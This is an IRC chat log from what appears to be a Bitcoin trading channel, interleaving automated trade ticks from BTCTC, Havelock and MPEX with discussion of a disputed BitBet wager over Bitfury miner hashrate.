[ACTIVEMINING] 214 @ 0.00354 = 0.7576 BTC [-] Sep 01 16:30:29 [BTCTC] [ACTIVEMINING] 53 @ 0.003537 = 0.1875 BTC [-] Sep 01 16:30:31 [BTCTC] [ACTIVEMINING] 2 @ 0.003537 = 0.0071 BTC [-] Sep 01 16:30:32 [BTCTC] [ACTIVEMINING] 297 @ 0.003519 = 1.0451 BTC [-] Sep 01 16:30:33 [BTCTC] [ACTIVEMINING] 1190 @ 0.003518 = 4.1864 BTC [-] Sep 01 16:30:47 [BTCTC] [LABCOIN] 2000 @ 0.003699 = 7.398 BTC [+] Sep 01 16:30:48 [BTCTC] [LABCOIN] 2000 @ 0.0037 = 7.4 BTC [+] Sep 01 16:35:48 https://www.bitfantasy.com/ Sep 01 16:35:51 BitFantasy - Fantasy RPG, sign up with bitcoin, trade directly with other players for bitcoin, no fe Sep 01 16:35:58 look all, someone's charging more than me. 50 btc to be a cool dude there. Sep 01 16:40:04 [MPEX] [S.MPOE] 5738 @ 0.00086194 = 4.9458 BTC [-] Sep 01 16:45:57 anyone wanna buy single chip bitfury miner off me? Sep 01 16:47:04 kakobrekla does it suck ? Sep 01 16:47:15 no, it blows. Sep 01 16:48:32 lol Sep 01 16:48:42 hurr Sep 01 16:49:28 btw kakobrekla what's sand, pesk ? Sep 01 16:50:00 yeah Sep 01 16:50:06 pesek Sep 01 16:50:18 yes, you are on/over the sand Sep 01 16:51:22 but pesek =/= pesk Sep 01 16:51:53 yeah forma != informal Sep 01 16:51:56 formal* Sep 01 16:52:21 i can travel 200km to Maribor and i wont understand anything they are saying Sep 01 16:52:41 very heavy dialets over here Sep 01 16:52:47 a ok Sep 01 16:52:47 pesk could also mean small dog Sep 01 16:52:51 [MPEX] [S.MPOE] 2300 @ 0.00086146 = 1.9814 BTC [-] Sep 01 16:53:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.02399 BTC [+] Sep 01 16:53:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.02399 = 0.072 BTC [+] Sep 01 16:53:38 depends on the context ofc Sep 01 16:54:07 if they're hot chicks in maribor and they're asking you to do them you'd understand, Sep 01 16:54:19 but if they're old hags asking you to gfive up your seat you wouldn't ? Sep 01 16:55:18 that would prolly hold true even if i was in somalia Sep 01 16:56:09 lol Sep 01 16:57:26 [BTCTC] [ACTIVEMINING] 18 @ 0.003587 = 0.0646 BTC [+] Sep 01 16:57:55 [BTCTC] [ACTIVEMINING] 18 @ 0.003587 = 0.0646 BTC [+] Sep 01 16:57:58 [BTCTC] [ACTIVEMINING] 50 @ 0.003588 = 0.1794 BTC [+] Sep 01 16:58:00 [BTCTC] [ACTIVEMINING] 4 @ 0.00359 = 0.0144 BTC [+] Sep 01 16:58:46 [BTCTC] [BFMINES] 5 @ 0.0032 = 0.016 BTC [+] Sep 01 16:58:57 [BTCTC] [LABCOIN] 3 @ 0.003705 = 0.0111 BTC [+] Sep 01 16:59:54 [BTCTC] [LABCOIN] 1500 @ 0.003705 = 5.5575 BTC [+] Sep 01 17:06:41 [HAVELOCK] [XBOND] 6 @ 0.00107 = 0.0064 BTC [-] Sep 01 17:07:25 [BTCTC] [DMS.PURCHASE] 48 @ 0.01588 = 0.7622 BTC [-] Sep 01 17:08:34 [BTCTC] [KENILWORTH] 12 @ 0.001797 = 0.0216 BTC [+] Sep 01 17:09:14 [BTCTC] [DMS.MINING] 5 @ 0.003 = 0.015 BTC [-] Sep 01 17:09:20 [BTCTC] [LABCOIN] 20 @ 0.003704 = 0.0741 BTC [-] Sep 01 17:09:21 [BTCTC] [LABCOIN] 77 @ 0.003705 = 0.2853 BTC [+] Sep 01 17:09:21 [BTCTC] [LABCOIN] 418 @ 0.003715 = 1.5529 BTC [+] Sep 01 17:09:22 [BTCTC] [LABCOIN] 565 @ 0.003728 = 2.1063 BTC [+] Sep 01 17:09:36 [HAVELOCK] [XBOND] 15 @ 0.00107 = 0.0161 BTC [-] Sep 01 17:12:01 [HAVELOCK] [LABCO] 97 @ 0.0031 = 0.3007 BTC [+] Sep 01 17:12:27 [HAVELOCK] [AM100] 1 @ 0.02474 BTC [-] Sep 01 17:12:38 [BTCTC] [ACTIVEMINING] 36 @ 0.003589 = 0.1292 BTC [-] Sep 01 17:13:01 [HAVELOCK] [XBOND] 1 @ 0.00116659 BTC [+] Sep 01 17:14:38 [BTCTC] [DMS.SELLING] 48 @ 0.01296 = 0.6221 BTC [+] Sep 01 17:16:01 [BTCTC] [PETA-MINE] 5 @ 0.6499 = 3.2495 BTC [-] Sep 01 17:18:59 ;ticker Sep 01 17:19:02 ;;ticker Sep 01 17:19:03 MtGox BTCUSD ticker | Best bid: 145.13901, Best ask: 145.97999, Bid-ask spread: 0.84098, Last trade: 145.97998, 24 hour volume: 27597.79881009, 24 hour low: 140.22000, 24 hour high: 148.70000, 24 hour vwap: 144.70263 Sep 01 17:22:30 [MPEX] [S.MPOE] 5565 @ 0.00086135 = 4.7934 BTC [-] Sep 01 17:22:46 [BTCTC] [ASICMINER-PT] 2 @ 2.499 = 4.998 BTC [-] Sep 01 17:22:47 [BTCTC] [ASICMINER-PT] 1 @ 2.499 BTC [-] Sep 01 17:22:48 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] Sep 01 17:22:50 [BTCTC] [ASICMINER-PT] 2 @ 2.506 = 5.012 BTC [+] Sep 01 17:23:53 [BTCTC] [TAT.ASICMINER] 30 @ 0.024 = 0.72 BTC [+] Sep 01 17:24:41 [BTCTC] [RSM] 10 @ 0.0115 = 0.115 BTC [-] Sep 01 17:24:56 [BTCTC] [BASIC-MINING] 1 @ 0.1711 BTC [-] Sep 01 17:25:50 [BTCTC] [BASIC-MINING] 4 @ 0.171 = 0.684 BTC [-] Sep 01 17:25:51 [BTCTC] [BASIC-MINING] 8 @ 0.171 = 1.368 BTC [-] Sep 01 17:27:26 [HAVELOCK] [AM100] 1 @ 0.02275 BTC [-] Sep 01 17:27:51 [HAVELOCK] [AM100] 4 @ 0.0227 = 0.0908 BTC [-] Sep 01 17:27:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.024 BTC [+] Sep 01 17:31:34 [BTCTC] [LABCOIN] 150 @ 0.003727 = 0.5591 BTC [-] Sep 01 17:32:38 [HAVELOCK] [AM100] 6 @ 0.02474 = 0.1484 BTC [+] Sep 01 17:33:13 [BTCTC] [LABCOIN] 115 @ 0.003728 = 0.4287 BTC [+] Sep 01 17:35:22 [BTCTC] [ACTIVEMINING] 181 @ 0.003541 = 0.6409 BTC [-] Sep 01 17:35:23 [BTCTC] [ACTIVEMINING] 45 @ 0.003538 = 0.1592 BTC [-] Sep 01 17:35:24 [BTCTC] [ACTIVEMINING] 422 @ 0.003531 = 1.4901 BTC [-] Sep 01 17:35:25 [BTCTC] [ACTIVEMINING] 3376 @ 0.00353 = 11.9173 BTC [-] Sep 01 17:37:06 [BTCTC] [LABCOIN] 97 @ 0.003731 = 0.3619 BTC [+] Sep 01 17:37:07 [BTCTC] [LABCOIN] 203 @ 0.003733 = 0.7578 BTC [+] Sep 01 17:38:42 TomServo that your application for 1btc ? Sep 01 17:39:26 [BTCTC] [LABCOIN] 20 @ 0.003731 = 0.0746 BTC [-] Sep 01 17:44:11 [BTCTC] [DMS.MINING] 2 @ 0.002951 = 0.0059 BTC [-] Sep 01 17:44:49 [BTCTC] [DMS.MINING] 6 @ 0.00295 = 0.0177 BTC [-] Sep 01 17:45:38 [BTCTC] [DMS.MINING] 1 @ 0.0029 BTC [-] Sep 01 17:46:14 Very dissapointed with BitBet's descision on http://bitbet.us/bet/520/bitfury-eu-august-orders-will-ship-before-1st/ --- not all conditions of the bet were met, and it was still decided yes. Sep 01 17:46:32 I'd urge everyone to consider twice before using bitbet in the future. Sep 01 17:46:38 [BTCTC] [LABCOIN] 200 @ 0.003732 = 0.7464 BTC [+] Sep 01 17:47:18 Seems like they admit all conditions were not met -- "all technicalities aside the bet was substantially delivered upon." technicalities are exactly why the bet is a no Sep 01 17:47:26 the 400Gh unit only hashes at 365Gh Sep 01 17:47:39 serious fraud going on here. Sep 01 17:48:31 Diablo-D3: The 400Gh unit as advertised did not meet performance (400Gh and 400W) Sep 01 17:48:34 the bet is a no Sep 01 17:49:29 [BTCTC] [DMS.MINING] 30 @ 0.00281 = 0.0843 BTC [-] Sep 01 17:49:30 [BTCTC] [DMS.MINING] 370 @ 0.00281 = 1.0397 BTC [-] Sep 01 17:49:43 Diablo-D3: well, apparently I was stupid enough to bet there...... Sep 01 17:49:54 complete bullshit. Sep 01 17:50:09 expensive lessson Sep 01 17:50:19 [BTCTC] [ACTIVEMINING] 1000 @ 0.003525 = 3.525 BTC [-] Sep 01 17:50:21 [BTCTC] [ACTIVEMINING] 3 @ 0.003471 = 0.0104 BTC [-] Sep 01 17:50:21 [BTCTC] [ACTIVEMINING] 15 @ 0.00347 = 0.0521 BTC [-] Sep 01 17:50:22 [BTCTC] [ACTIVEMINING] 159 @ 0.003454 = 0.5492 BTC [-] Sep 01 17:50:23 [BTCTC] [ACTIVEMINING] 39 @ 0.00345 = 0.1346 BTC [-] Sep 01 17:50:25 [BTCTC] [ACTIVEMINING] 137 @ 0.003425 = 0.4692 BTC [-] Sep 01 17:50:26 [BTCTC] [ACTIVEMINING] 50 @ 0.003424 = 0.1712 BTC [-] Sep 01 17:50:27 [BTCTC] [ACTIVEMINING] 500 @ 0.003423 = 1.7115 BTC [-] Sep 01 17:50:28 [BTCTC] [ACTIVEMINING] 375 @ 0.003401 = 1.2754 BTC [-] Sep 01 17:50:29 [BTCTC] [ACTIVEMINING] 500 @ 0.0034 = 1.7 BTC [-] Sep 01 17:50:30 [BTCTC] [ACTIVEMINING] 1000 @ 0.0034 = 3.4 BTC [-] Sep 01 17:50:38 I'm going to use it to motivate me though -- I'll be coding a competing site starting next week to put them out of business. 0% fees. Sep 01 17:50:48 complete fraud. Sep 01 17:51:05 [BTCTC] [LABCOIN] 688 @ 0.003732 = 2.5676 BTC [+] Sep 01 17:51:06 [BTCTC] [LABCOIN] 97 @ 0.003733 = 0.3621 BTC [+] Sep 01 17:51:08 [BTCTC] [LABCOIN] 870 @ 0.003735 = 3.2495 BTC [+] Sep 01 17:51:09 [BTCTC] [LABCOIN] 701 @ 0.003735 = 2.6182 BTC [+] Sep 01 17:51:10 [BTCTC] [LABCOIN] 940 @ 0.003738 = 3.5137 BTC [+] Sep 01 17:51:11 [BTCTC] [LABCOIN] 753 @ 0.003744 = 2.8192 BTC [+] Sep 01 17:51:12 [BTCTC] [LABCOIN] 630 @ 0.003745 = 2.3594 BTC [+] Sep 01 17:51:13 [BTCTC] [LABCOIN] 10 @ 0.003746 = 0.0375 BTC [+] Sep 01 17:51:14 [BTCTC] [LABCOIN] 587 @ 0.003746 = 2.1989 BTC [+] Sep 01 17:51:15 [BTCTC] [LABCOIN] 30 @ 0.003747 = 0.1124 BTC [+] Sep 01 17:51:16 [BTCTC] [LABCOIN] 150 @ 0.003748 = 0.5622 BTC [+] Sep 01 17:51:39 just to take business form them. now its personal. Sep 01 17:51:50 I can't allow other people to be defrauded. Sep 01 17:52:07 personal business ?! Sep 01 17:52:22 [BTCTC] [ACTIVEMINING] 133 @ 0.003337 = 0.4438 BTC [-] Sep 01 17:52:24 [BTCTC] [ACTIVEMINING] 33 @ 0.003334 = 0.11 BTC [-] Sep 01 17:52:25 [BTCTC] [ACTIVEMINING] 270 @ 0.00333 = 0.8991 BTC [-] Sep 01 17:52:26 [BTCTC] [ACTIVEMINING] 80 @ 0.003329 = 0.2663 BTC [-] Sep 01 17:52:28 [BTCTC] [ACTIVEMINING] 1000 @ 0.003327 = 3.327 BTC [-] Sep 01 17:52:29 [BTCTC] [ACTIVEMINING] 63 @ 0.003311 = 0.2086 BTC [-] Sep 01 17:52:30 [BTCTC] [ACTIVEMINING] 100 @ 0.00331 = 0.331 BTC [-] Sep 01 17:52:31 [BTCTC] [ACTIVEMINING] 600 @ 0.00331 = 1.986 BTC [-] Sep 01 17:52:32 [BTCTC] [ACTIVEMINING] 49 @ 0.003309 = 0.1621 BTC [-] Sep 01 17:52:33 [BTCTC] [ACTIVEMINING] 916 @ 0.003304 = 3.0265 BTC [-] Sep 01 17:52:41 yes. Its clear that ALL conditions of a bet must be met -- they weren't.... Sep 01 17:52:49 [BTCTC] [LABCOIN] 4891 @ 0.003749 = 18.3364 BTC [+] Sep 01 17:53:12 traditionally it's presented as a dichotomy, business / personal. Sep 01 17:53:20 [BTCTC] [TAT.ASICMINER] 8 @ 0.024 = 0.192 BTC [+] Sep 01 17:53:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.024 BTC [+] Sep 01 17:53:23 [BTCTC] [TAT.ASICMINER] 16 @ 0.0244 = 0.3904 BTC [+] Sep 01 17:53:40 [BTCTC] [ACTIVEMINING] 133 @ 0.003307 = 0.4398 BTC [+] Sep 01 17:53:41 [BTCTC] [ACTIVEMINING] 2084 @ 0.003304 = 6.8855 BTC [-] Sep 01 17:53:43 [BTCTC] [ACTIVEMINING] 40 @ 0.003303 = 0.1321 BTC [-] Sep 01 17:53:44 [BTCTC] [ACTIVEMINING] 2 @ 0.003302 = 0.0066 BTC [-] Sep 01 17:53:45 [BTCTC] [ACTIVEMINING] 5000 @ 0.0033 = 16.5 BTC [-] Sep 01 17:53:47 [BTCTC] [ACTIVEMINING] 44 @ 0.003365 = 0.1481 BTC [+] Sep 01 17:53:56 well, bitbet is clearly a fraudulent site -- logic and reason shows that the bet was a no. I dont know what else to say. Sep 01 17:53:57 [BTCTC] [DMS.MINING] 14 @ 0.002775 = 0.0389 BTC [-] Sep 01 17:54:10 i'd use fractal 's site to make a bet bitbet are scammers :D Sep 01 17:54:25 Lol careful what you say Sep 01 17:54:35 Graet and you'd bet on yes ? Sep 01 17:54:43 i agree "substantially delivered upon" != delivered upon Sep 01 17:54:48 [BTCTC] [ACTIVEMINING] 111 @ 0.003258 = 0.3616 BTC [-] Sep 01 17:54:49 [BTCTC] [ACTIVEMINING] 10 @ 0.0032 = 0.032 BTC [-] Sep 01 17:54:51 [BTCTC] [ACTIVEMINING] 48 @ 0.003199 = 0.1536 BTC [-] Sep 01 17:54:52 [BTCTC] [ACTIVEMINING] 4704 @ 0.003182 = 14.9681 BTC [-] Sep 01 17:54:54 [BTCTC] [LABCOIN] 600 @ 0.003749 = 2.2494 BTC [+] Sep 01 17:54:55 [BTCTC] [ACTIVEMINING] 10 @ 0.003181 = 0.0318 BTC [-] Sep 01 17:54:56 [BTCTC] [LABCOIN] 8350 @ 0.00375 = 31.3125 BTC [+] Sep 01 17:54:57 [BTCTC] [LABCOIN] 1382 @ 0.003761 = 5.1977 BTC [+] Sep 01 17:54:58 [BTCTC] [ACTIVEMINING] 687 @ 0.003156 = 2.1682 BTC [-] Sep 01 17:54:59 [BTCTC] [ACTIVEMINING] 48 @ 0.00314 = 0.1507 BTC [-] Sep 01 17:54:59 no shit. Not all condidiotns of the bet were met Sep 01 17:54:59 [BTCTC] [LABCOIN] 78 @ 0.003774 = 0.2944 BTC [+] Sep 01 17:55:00 [BTCTC] [LABCOIN] 4550 @ 0.003776 = 17.1808 BTC [+] Sep 01 17:55:01 [BTCTC] [ACTIVEMINING] 500 @ 0.003105 = 1.5525 BTC [-] Sep 01 17:55:02 [BTCTC] [LABCOIN] 550 @ 0.003795 = 2.0873 BTC [+] Sep 01 17:55:03 [BTCTC] [ACTIVEMINING] 50 @ 0.0031 = 0.155 BTC [-] Sep 01 17:55:04 [BTCTC] [LABCOIN] 5011 @ 0.003796 = 19.0218 BTC [+] Sep 01 17:55:05 [BTCTC] [LABCOIN] 199 @ 0.003797 = 0.7556 BTC [+] Sep 01 17:55:06 [BTCTC] [ACTIVEMINING] 49 @ 0.003081 = 0.151 BTC [-] Sep 01 17:55:07 [BTCTC] [LABCOIN] 4083 @ 0.003798 = 15.5072 BTC [+] Sep 01 17:55:08 [BTCTC] [LABCOIN] 430 @ 0.003799 = 1.6336 BTC [+] Sep 01 17:55:09 [BTCTC] [ACTIVEMINING] 3943 @ 0.003051 = 12.0301 BTC [-] Sep 01 17:55:09 [BTCTC] [LABCOIN] 25 @ 0.003799 = 0.095 BTC [+] Sep 01 17:55:10 [BTCTC] [LABCOIN] 580 @ 0.003799 = 2.2034 BTC [+] Sep 01 17:55:11 [BTCTC] [LABCOIN] 1300 @ 0.003799 = 4.9387 BTC [+] Sep 01 17:55:12 [BTCTC] [LABCOIN] 8438 @ 0.0038 = 32.0644 BTC [+] Sep 01 17:55:13 [BTCTC] [LABCOIN] 1000 @ 0.0038 = 3.8 BTC [+] Sep 01 17:55:14 [BTCTC] [LABCOIN] 150 @ 0.0038 = 0.57 BTC [+] Sep 01 17:55:18 [MPEX] [S.MPOE] 5194 @ 0.00086146 = 4.4744 BTC [+] Sep 01 17:55:21 Diablo-D3: they ended up with more then 400Gh. But the 400Gh unit did not perform as advertised -- as was required by the bet Sep 01 17:55:22 [MPEX] [S.MPOE] 14056 @ 0.00086207 = 12.1173 BTC [+] Sep 01 17:55:24 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Sep 01 17:55:48 [BTCTC] [LABCOIN] 30 @ 0.003811 = 0.1143 BTC [+] Sep 01 17:55:48 [BTCTC] [LABCOIN] 5000 @ 0.00383 = 19.15 BTC [+] Sep 01 17:55:50 [BTCTC] [LABCOIN] 177 @ 0.003842 = 0.68 BTC [+] Sep 01 17:55:51 [BTCTC] [LABCOIN] 50 @ 0.003842 = 0.1921 BTC [+] Sep 01 17:55:52 [BTCTC] [LABCOIN] 345 @ 0.003843 = 1.3258 BTC [+] Sep 01 17:55:53 [BTCTC] [LABCOIN] 2131 @ 0.003847 = 8.198 BTC [+] Sep 01 17:56:16 Diablo-D3: Less then 400Gh -- 365Gh Sep 01 17:56:26 [BTCTC] [LABCOIN] 2012 @ 0.003849 = 7.7442 BTC [+] Sep 01 17:56:27 [BTCTC] [LABCOIN] 3500 @ 0.003849 = 13.4715 BTC [+] Sep 01 17:56:29 therefore , the hardware as advertised, failed to meet performance numbers Sep 01 17:57:11 so when's this new site coming online ? i think i'd bet a little on yes myself. Sep 01 17:57:17 This is what was advertised as a 400Gh 'UNIT' -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" Sep 01 17:57:51 Diablo-D3: Advertised was 400Gh, it actually performs at 365Gh. Sep 01 17:58:18 W was under 400. They delivered on W, and missed on Gh Sep 01 17:59:03 apparenytly 300W Sep 01 17:59:06 [BTCTC] [ACTIVEMINING] 515 @ 0.003496 = 1.8004 BTC [+] Sep 01 17:59:07 [BTCTC] [ACTIVEMINING] 3820 @ 0.003499 = 13.3662 BTC [+] Sep 01 17:59:26 Diablo-D3: yes, but as per the bet -- The hardware missed performance targets. Sep 01 17:59:55 Diablo-D3: not without a hardware mod that voids warranty Sep 01 18:00:11 so, as shipped, it didn't meet performance targets Sep 01 18:00:18 [BTCTC] [LABCOIN] 243 @ 0.00385 = 0.9356 BTC [+] Sep 01 18:00:20 [BTCTC] [LABCOIN] 447 @ 0.00385 = 1.721 BTC [+] Sep 01 18:00:31 exactly.... It's absolutely unbelieveable that the bet was passed as a yes. Sep 01 18:00:37 [BTCTC] [PETA-MINE] 10 @ 0.645 = 6.45 BTC [-] Sep 01 18:00:56 fraudlent actually... this will certainly affect Bitbet's image, as I'm writing a long and drawn out forum post right now Sep 01 18:01:28 Diablo-D3: It will make noise -- and when I launch my site, people will use it when they hear the back-story Sep 01 18:01:32 i will if you link it, cgf searching for thier thread :) Sep 01 18:02:43 this should be fun. Sep 01 18:03:02 [BTCTC] [LABCOIN] 553 @ 0.00385 = 2.1291 BTC [+] Sep 01 18:03:04 [BTCTC] [LABCOIN] 200 @ 0.003851 = 0.7702 BTC [+] Sep 01 18:03:05 [BTCTC] [LABCOIN] 312 @ 0.00386 = 1.2043 BTC [+] Sep 01 18:03:19 fun? whats fun about passing a bet that didn't meet all conditions? Sep 01 18:03:28 do you seriously think that 400Gh = 365Gh? Sep 01 18:03:53 dude, i would like to see your site. sooner or later you're going to have someone lose some btc on a bet, and they'll be pissed off, and you'll be wiser for the experience. Sep 01 18:04:29 fail that, you'll get to learn the hard way why coding a site is not worth the electric power it took, on its own. Sep 01 18:06:00 i always come in this channel Sep 01 18:06:05 and if mircea_popescu is saying something Sep 01 18:06:11 it's usually something i've heard him say before Sep 01 18:06:23 lol Sep 01 18:06:26 [BTCTC] [ACTIVEMINING] 1 @ 0.003467 BTC [-] Sep 01 18:06:29 I imagine now this is how a parent feels when their child won't stop sticking forks in the electrical outlets. Sep 01 18:06:33 *le sigh* Sep 01 18:06:33 i guess i'm really very boring. Sep 01 18:06:54 I think my point was more to the "infinite hitpoints" thing. Sep 01 18:06:59 a Sep 01 18:07:24 No matter how much you say the same thing, the scammors still come in here with there scammy scamness claiming to be bad asses. Sep 01 18:07:31 [HAVELOCK] [XBOND] 2 @ 0.00116659 = 0.0023 BTC [+] Sep 01 18:07:35 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.0008001 = 0.0072 BTC [-] Sep 01 18:07:37 [BTCTC] [TAT.VIRTUALMINE] 40 @ 0.0008 = 0.032 BTC [-] Sep 01 18:08:07 well what's in a saying. Sep 01 18:08:18 what ar eyou talking about? did you think the bet was a yes? seriously???? Sep 01 18:08:34 [BTCTC] [ASICMINER-PT] 1 @ 2.475 BTC [-] Sep 01 18:08:49 [BTCTC] [PETA-MINE] 15 @ 0.6526 = 9.789 BTC [+] Sep 01 18:09:22 he's also the guy creating an economic climate you can survive in to pay back your scamholders mr. Diablo-D3 (i kid i kid) Sep 01 18:09:25 fractal you realise that the bet split 14:10 or something. you're not in the majority you for some reason perceive. Sep 01 18:09:46 i can troll too :P Sep 01 18:09:52 paid* Sep 01 18:09:55 :D Sep 01 18:11:14 unrelatedly, i wonder how the legal system would work irl if every time someone got convicted or anything + every time someone lost a civil case they got space in the newspaper to expound on how the legal system is a fraud. Sep 01 18:12:07 [BTCTC] [ACTIVEMINING] 400 @ 0.003438 = 1.3752 BTC [-] Sep 01 18:12:09 it'd probably keep government much smaller and more tolerable at any rate. Sep 01 18:12:51 [BTCTC] [ACTIVEMINING] 49 @ 0.003438 = 0.1685 BTC [-] Sep 01 18:12:53 [BTCTC] [ACTIVEMINING] 884 @ 0.003441 = 3.0418 BTC [+] Sep 01 18:12:54 [BTCTC] [ACTIVEMINING] 449 @ 0.003442 = 1.5455 BTC [+] Sep 01 18:12:54 [BTCTC] [ACTIVEMINING] 618 @ 0.003445 = 2.129 BTC [+] Sep 01 18:12:56 [HAVELOCK] [XBOND] 2 @ 0.00116659 = 0.0023 BTC [+] Sep 01 18:13:30 [BTCTC] [ASICMINER-PT] 2 @ 2.47 = 4.94 BTC [-] Sep 01 18:13:35 14:11, and its only because Anduck wrote the bet and put up 10. he apaprently has inside knowledge from punin on when shipping was occuring -- not that theres a problem with that,, but there were more individual no bettors then yet Sep 01 18:14:04 so how much did you bet ? Sep 01 18:14:16 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] Sep 01 18:14:30 [HAVELOCK] [HIM] 10 @ 0.161 = 1.61 BTC [-] Sep 01 18:14:36 [BTCTC] [ACTIVEMINING] 2 @ 0.003438 = 0.0069 BTC [-] Sep 01 18:14:49 [BTCTC] [ASICMINER-PT] 1 @ 2.461 BTC [-] Sep 01 18:14:51 [BTCTC] [ASICMINER-PT] 2 @ 2.46 = 4.92 BTC [-] Sep 01 18:14:55 Diablo-D3: Apparently they are going to ship out more hardware to make up for missed hashrate -- but that doesnt change the fact that the unit as advertised misses performance Sep 01 18:16:35 [BTCTC] [ACTIVEMINING] 25 @ 0.003397 = 0.0849 BTC [-] Sep 01 18:16:43 Diablo-D3: you can't though -- all conditions of the bet have to be met -- they weren't. regardless of refund. Sep 01 18:16:55 refund doesnt change the fact that the hardware underperforms Sep 01 18:17:39 Diablo-D3: I don't disagree. Sep 01 18:17:46 Diablo-D3: but thats not what the bet says Sep 01 18:18:07 It says the 400Gh UNIT as advertised must be 400Gh and under 400W Sep 01 18:18:09 [BTCTC] [ACTIVEMINING] 1 @ 0.003151 BTC [-] Sep 01 18:18:11 [BTCTC] [ACTIVEMINING] 4 @ 0.00315 = 0.0126 BTC [-] Sep 01 18:18:13 [BTCTC] [ACTIVEMINING] 179 @ 0.003147 = 0.5633 BTC [-] Sep 01 18:18:14 [BTCTC] [ACTIVEMINING] 44 @ 0.003144 = 0.1383 BTC [-] Sep 01 18:18:15 [BTCTC] [ACTIVEMINING] 176 @ 0.003143 = 0.5532 BTC [-] Sep 01 18:18:16 [BTCTC] [ACTIVEMINING] 12 @ 0.003133 = 0.0376 BTC [-] Sep 01 18:18:17 [BTCTC] [ACTIVEMINING] 48 @ 0.003132 = 0.1503 BTC [-] Sep 01 18:18:19 [BTCTC] [ACTIVEMINING] 7 @ 0.00312 = 0.0218 BTC [-] Sep 01 18:18:20 [BTCTC] [ACTIVEMINING] 30 @ 0.003119 = 0.0936 BTC [-] Sep 01 18:18:22 [BTCTC] [ACTIVEMINING] 600 @ 0.003103 = 1.8618 BTC [-] Sep 01 18:18:32 [BTCTC] [ACTIVEMINING] 179 @ 0.003103 = 0.5554 BTC [-] Sep 01 18:18:35 Diablo-D3: For sure its a bad bet. I'm an idiot for betting on it i suppose. Sep 01 18:18:37 http://bitbet.us/bet/524/litecoin-to-rise-above-04-btc-before-2014/ does that mean it has to reach it *once*? wouldn't that be easily gamed a day of low volume? Sep 01 18:18:42 BitBet - Litecoin to rise above .04 BTC before 2014 Sep 01 18:19:16 [BTCTC] [ACTIVEMINING] 150 @ 0.003101 = 0.4652 BTC [-] Sep 01 18:19:37 it does mean it has to rise once, and obviously the bet is limited by the underlying. Sep 01 18:19:46 don't bet more than it'd be needed to manipulate it. Sep 01 18:20:09 [BTCTC] [ACTIVEMINING] 300 @ 0.003102 = 0.9306 BTC [+] Sep 01 18:20:26 fractal just, you know, make better ones. nothing prevents you from only betting on bets you yourself make. Sep 01 18:20:26 [BTCTC] [ACTIVEMINING] 100 @ 0.003102 = 0.3102 BTC [+] Sep 01 18:20:27 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [-] Sep 01 18:20:32 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [-] Sep 01 18:20:39 [BTCTC] [ACTIVEMINING] 600 @ 0.003102 = 1.8612 BTC [+] Sep 01 18:20:59 [BTCTC] [ACTIVEMINING] 147 @ 0.003102 = 0.456 BTC [+] Sep 01 18:21:10 [BTCTC] [ASICMINER-PT] 2 @ 2.46 = 4.92 BTC [-] Sep 01 18:21:37 [BTCTC] [BTC-GROWTH] 5 @ 0.09806 = 0.4903 BTC [-] Sep 01 18:21:39 [BTCTC] [BTC-GROWTH] 2 @ 0.09805 = 0.1961 BTC [-] Sep 01 18:21:40 [BTCTC] [BTC-GROWTH] 3 @ 0.09802 = 0.2941 BTC [-] Sep 01 18:21:58 "nothing prevents you from only betting on bets you yourself make." fair enough --- still thought the arbitrators would have enough logic to see that this bet shouldnt pass Sep 01 18:22:09 [HAVELOCK] [HIM] 5 @ 0.16 = 0.8 BTC [-] Sep 01 18:22:15 or at least be annuled due to pooor bet language Sep 01 18:22:30 [BTCTC] [ASICMINER-PT] 3 @ 2.46 = 7.38 BTC [-] Sep 01 18:23:13 bets aren't annulled due to poor language. that's part of the sandbox. they're resolved as best can be. Sep 01 18:23:42 [BTCTC] [ASICMINER-PT] 3 @ 2.454 = 7.362 BTC [-] Sep 01 18:23:43 [BTCTC] [ASICMINER-PT] 1 @ 2.454 BTC [-] Sep 01 18:23:45 [BTCTC] [ASICMINER-PT] 5 @ 2.453 = 12.265 BTC [-] Sep 01 18:23:46 [BTCTC] [ASICMINER-PT] 5 @ 2.451 = 12.255 BTC [-] Sep 01 18:23:47 [BTCTC] [ASICMINER-PT] 16 @ 2.451 = 39.216 BTC [-] Sep 01 18:23:55 this one was definitely close, which is unfortunate but will happen no matter what. i could see both ends of it myself. Sep 01 18:24:32 [BTCTC] [TAT.ASICMINER] 10 @ 0.0235 = 0.235 BTC [-] Sep 01 18:24:33 [BTCTC] [TAT.ASICMINER] 6 @ 0.02331 = 0.1399 BTC [-] Sep 01 18:24:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.02331 BTC [-] Sep 01 18:24:36 [BTCTC] [TAT.ASICMINER] 31 @ 0.0233 = 0.7223 BTC [-] Sep 01 18:24:37 [BTCTC] [TAT.ASICMINER] 24 @ 0.02307 = 0.5537 BTC [-] Sep 01 18:24:37 [BTCTC] [TAT.ASICMINER] 22 @ 0.02306 = 0.5073 BTC [-] Sep 01 18:24:38 [BTCTC] [TAT.ASICMINER] 100 @ 0.02305 = 2.305 BTC [-] Sep 01 18:24:39 [BTCTC] [TAT.ASICMINER] 10 @ 0.02304 = 0.2304 BTC [-] Sep 01 18:24:41 [BTCTC] [TAT.ASICMINER] 50 @ 0.02303 = 1.1515 BTC [-] Sep 01 18:24:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.02302 BTC [-] Sep 01 18:24:43 [BTCTC] [TAT.ASICMINER] 7 @ 0.02301 = 0.1611 BTC [-] Sep 01 18:24:44 [BTCTC] [TAT.ASICMINER] 35 @ 0.023 = 0.805 BTC [-] Sep 01 18:24:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.02293 BTC [-] Sep 01 18:24:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.02292 = 0.1146 BTC [-] Sep 01 18:24:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.02291 = 0.1146 BTC [-] Sep 01 18:24:47 [BTCTC] [TAT.ASICMINER] 15 @ 0.0229 = 0.3435 BTC [-] Sep 01 18:24:53 is that a first time under 